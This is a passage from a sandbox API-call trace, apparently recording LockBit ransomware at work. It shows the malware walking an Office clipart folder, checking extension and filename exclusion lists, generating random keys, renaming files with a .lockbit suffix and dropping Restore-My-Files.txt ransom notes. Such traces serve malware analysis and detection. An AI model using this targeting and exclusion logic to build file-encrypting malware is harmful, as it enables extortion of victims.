lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387578.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387578.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.385] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.385] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.399] free (_Block=0x1fa2ed8) [0161.399] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387578.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.399] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.399] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.399] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x98c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0387591.JPG", cAlternateFileName="")) returned 1 [0161.399] lstrcmpiW (lpString1=".", lpString2="J0387591.JPG") returned -1 [0161.399] lstrcmpiW (lpString1="..", lpString2="J0387591.JPG") returned -1 [0161.399] PathFindExtensionW (pszPath="J0387591.JPG") returned=".JPG" [0161.399] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.399] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.399] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.399] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.399] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.399] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.399] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.399] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.400] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.400] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.401] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.401] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.401] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.401] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.401] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.401] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.401] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.401] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.401] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.401] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.401] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.401] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.401] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.401] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0387591.JPG") returned 1 [0161.401] lstrcmpiW (lpString1="ntldr", lpString2="J0387591.JPG") returned 1 [0161.401] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0387591.JPG") returned 1 [0161.401] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0387591.JPG") returned -1 [0161.401] lstrcmpiW (lpString1="autorun.inf", lpString2="J0387591.JPG") returned -1 [0161.401] lstrcmpiW (lpString1="thumbs.db", lpString2="J0387591.JPG") returned 1 [0161.401] lstrcmpiW (lpString1="iconcache.db", lpString2="J0387591.JPG") returned -1 [0161.401] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.401] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387591.JPG") returned=".JPG" [0161.401] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.401] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.401] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.401] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.402] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.402] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.402] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387591.JPG.lockbit") returned 72 [0161.402] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387591.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387591.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.405] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.405] malloc (_Size=0x40068) returned 0x3df0008 [0161.405] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=39111) returned 1 [0161.405] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.406] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.406] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.406] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.406] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.412] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387591.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387591.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.412] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.412] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.414] free (_Block=0x1fa2ed8) [0161.414] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387591.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.414] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.414] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.415] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66220ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb9bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0387604.JPG", cAlternateFileName="")) returned 1 [0161.415] lstrcmpiW (lpString1=".", lpString2="J0387604.JPG") returned -1 [0161.415] lstrcmpiW (lpString1="..", lpString2="J0387604.JPG") returned -1 [0161.415] PathFindExtensionW (pszPath="J0387604.JPG") returned=".JPG" [0161.415] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.415] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.415] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.415] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.415] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.415] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.415] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.415] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.415] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.415] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.415] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.415] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.415] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.415] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.415] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.415] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.415] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.415] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.415] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.416] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.416] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.416] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.416] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.416] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.416] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.416] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.416] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.416] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.416] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.416] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.417] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.417] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.417] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0387604.JPG") returned 1 [0161.417] lstrcmpiW (lpString1="ntldr", lpString2="J0387604.JPG") returned 1 [0161.417] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0387604.JPG") returned 1 [0161.417] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0387604.JPG") returned -1 [0161.417] lstrcmpiW (lpString1="autorun.inf", lpString2="J0387604.JPG") returned -1 [0161.417] lstrcmpiW (lpString1="thumbs.db", lpString2="J0387604.JPG") returned 1 [0161.417] lstrcmpiW (lpString1="iconcache.db", lpString2="J0387604.JPG") returned -1 [0161.417] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.417] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387604.JPG") returned=".JPG" [0161.417] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.417] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.417] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.417] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.418] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.418] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.418] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.418] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.418] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.418] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387604.JPG.lockbit") returned 72 [0161.418] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387604.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387604.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.419] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.419] malloc (_Size=0x40068) returned 0x3df0008 [0161.419] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=47551) returned 1 [0161.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.421] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387604.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387604.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.426] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.426] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.428] free (_Block=0x1fa2ed8) [0161.428] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387604.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.428] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.428] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.428] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x98ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0387882.JPG", cAlternateFileName="")) returned 1 [0161.429] lstrcmpiW (lpString1=".", lpString2="J0387882.JPG") returned -1 [0161.429] lstrcmpiW (lpString1="..", lpString2="J0387882.JPG") returned -1 [0161.429] PathFindExtensionW (pszPath="J0387882.JPG") returned=".JPG" [0161.429] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.429] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.429] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.430] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.430] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.430] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.430] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.430] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.430] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.430] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.430] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.430] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.430] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.430] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0387882.JPG") returned 1 [0161.430] lstrcmpiW (lpString1="ntldr", lpString2="J0387882.JPG") returned 1 [0161.430] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0387882.JPG") returned 1 [0161.430] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0387882.JPG") returned -1 [0161.431] lstrcmpiW (lpString1="autorun.inf", lpString2="J0387882.JPG") returned -1 [0161.431] lstrcmpiW (lpString1="thumbs.db", lpString2="J0387882.JPG") returned 1 [0161.431] lstrcmpiW (lpString1="iconcache.db", lpString2="J0387882.JPG") returned -1 [0161.431] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.431] PathFindExtensionW 